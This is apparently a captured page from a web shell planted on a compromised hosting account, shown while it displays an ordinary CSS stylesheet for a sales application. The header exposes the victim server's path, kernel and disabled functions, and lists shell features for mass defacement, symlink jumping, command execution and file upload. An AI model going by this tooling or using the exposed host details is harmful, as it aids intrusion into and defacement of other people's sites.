Comming ucUs SH3LL V.2

Path : /home/gujo45me/public_html/oliva/public/css/
Disable Functions : exec,passthru,shell_exec,system
System : Linux server-604606.appsiete.com 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64

[ Home ][ Zone-h ][ Jumping ][ Symlink ][ Mass Depes ][ Command ]

File Upload :
Current File : /home/gujo45me/public_html/oliva/public/css/main.css

/*================================================================================
Project Name: Seven - Sistema de Ventas
Version: 1.0
Author: Carlos Yasmany
================================================================================*/

:root {
	--background-color: #E8EAED;
	--sidebar-color: #2C323D;
	--height-menu: 60px;
	--width-sidebar: 260px;
}

input[disabled], select[disabled], textarea[disabled], input[readonly], select[readonly], textarea[readonly] {
    cursor: not-allowed !important;
    background-color: #f6f6f6 !important;
}

body.pushable>.pusher {
    background: var(--background-color) !important;
}

#pusher{
	transition-duration: 0s; 
}


/*======================================*/
/* 				sidebar                 */
/*======================================*/
#sidebar{
    background: var(--sidebar-color) !important;
	transition-duration: 0s; 
	width: var(--width-sidebar) !important;
}

.logo_sidebar{
	background: #373C47;
	text-align: center;
	height: var(--height-menu) !important;
	-webkit-box-shadow: 0 2px 1px -1px rgba(0,0,0,.2), 0 1px 1px 0 rgba(0,0,0,.14), 0 1px 3px 0 rgba(0,0,0,.12);
    box-shadow: 0 2px 1px -1px rgba(0,0,0,.2), 0 1px 1px 0 rgba(0,0,0,.14), 0 1px 3px 0 rgba(0,0,0,.12);
}

.logo_sidebar img {
    margin-left: 20px !important;
}

.sidebar_icon {
    float: left !important;
    margin: -8px 10px 0 0 !important;
}


.ui.accordion .title {
	font-size: 1.2rem !important;
    padding: 16px !important;
    color: rgba(255,255,255,0.7) !important;

}
.ui.accordion .title:hover {
    color: white !important;|
}
.ui.accordion .content {
    font-size: 1.05rem !important;
    margin-left: 40px !important;
}

.ui.accordion .content a:hover {
	box-shadow: inset 3px 0 0 0 #00a8ff;
}
/*======================================*/
/* 			 	navbar    	            */
/*======================================*/

#navbar {
	border-radius: 0;
	border: 0;
	height: var(--height-menu) !important;
	box-shadow: 0 2px 1px -1px rgba(0,0,0,.2), 0 1px 1px 0 rgba(0,0,0,.14), 0 1px 3px 0 rgba(0,0,0,.12);
}

#launch_icon i{
	margin-top: 7px !important;
}

.margin_dropdown{
	margin-top: 5px !important;
}
.alert_icon{
	margin-top: -20px !important;
	margin-left: -3px !important;
}
.border_shadow{
    border: 1px solid rgba(100, 100, 100, .4) !important;
    border-radius: 0 0 2px 2px;
    box-shadow: 0 3px 8px rgba(0, 0, 0, .25) !important;
    color: #1d2129 !important;
}

#menu_usuario{
	min-width: 45px !important
}

/*======================================*/
/* 			   content                  */
/*======================================*/

.ui.form .field>label {
    color: rgba(0, 0, 0, 1) !important;
    font-weight: bold !important;
    font-size: 1.1rem !important;
}

.ui.segment{
	padding: 25px !important;
	border: 0 !important;
	box-shadow: 0 0 20px 0 rgba(136,136,136,0.50) !important;
}

.form_footer{
	width: 100% !important; 
	overflow: hidden !important;
	margin-top: 40px !important;
}

.ui.form .label{
	text-align: right !important;
} 

.message_header {
    font-size: 1.02em !important;
    display: block; 
    font-weight: bold; 
    margin: -0.14285714em 0em 0rem 0em; 
    text-align: right !important;
}

/*======================================*/
/* 	       estilos tables               */
/*======================================*/
.head_table{
	background: #767676 !important;
	color:#fff!important;
	text-align: center!important;
	font-size: 0.95rem!important;	
}
tbody tr:hover td, tbody tr:hover th {
    background-color: #f5f5f5;
}
tbody tr td, tbody tr th {
    text-align: center!important;
    font-size: 0.9rem!important;	
}

/*======================================*/
/* 	       estilos loader               */
/*======================================*/

.ui.inverted.dimmer.ajax .ui.loader:after {
    border-color: #2E9AFE transparent transparent!important;
}

/*======================================*/
/* 	       estilos perfil               */
/*======================================*/

.profileheader {
    background: url(../img/profileheader.jpg) no-repeat top center;
    width: 100%;
    height: 200px;
 	border-radius: 5px;
    text-align: right;
    padding: 2em !important;
}

/*======================================*/
/* 	       estilos venta               */
/*======================================*/

.datos_comprobante {
	border: 2px solid #000000;
    border-radius: 10px;
    text-align: center !important;
    padding: 0em 0em 0em 0em !important;
}
#select_comprobante_venta{
	margin: 0 auto !important;
	width: 95% !important;
	text-align: center !important;
	margin-top: 10px !important;
}
#select_comprobante_contingencia{
	margin: 0 auto !important;
	width: 95% !important;
	text-align: center !important;
	margin-top: 10px !important;
}

.input_contingencia {
	float: left !important;
    padding: 0.5em 1em !important;
    display: inline-block !important;
    font-size: 12px !important;
}


/*======================================*/
/* 			 estilo de file upload      */
/*======================================*/


#cargar-imagen input[type="file"] {
  display: none;
}

#cargar-logo input[type="file"] {
  display: none;
}
#cargar-certificado input[type="file"] {
  display: none;
}
/*======================================*/
/* 			GOOGLE MAPS  		        */
/*======================================*/

#map {
  height: 100%;
  width: 100%;
  vertical-align: top;
}


/*======================================*/
/* 			 media querys               */
/*======================================*/


@media screen and (max-width: 800px) {
	#menu_notificaciones{
		display: none;
	}
	.ui.form .label{
		text-align: left !important;
	}
	
}

@media only screen and (max-width: 767px){
	#avatar_profile{
		margin-top: -40px !important; 
		width: 80px !important; 
	} 
	#venta_icon{
		display: none!important; 
	} 
	

}

@media screen and (max-width: 600px) {
	#menu_sucursales{
		display: none;
	}
	#avatar_profile{
		margin-top: -30px !important; 
		width: 50px !important; 
	}
}

@media screen and (max-width: 480px) {
	.export_files{
		display: none!important; 
	}
}

@media screen and (max-width: 320px) {
	#menu_usuario{
		display: none;
	}
}

Copyright © 2019 | Powered By MecUs7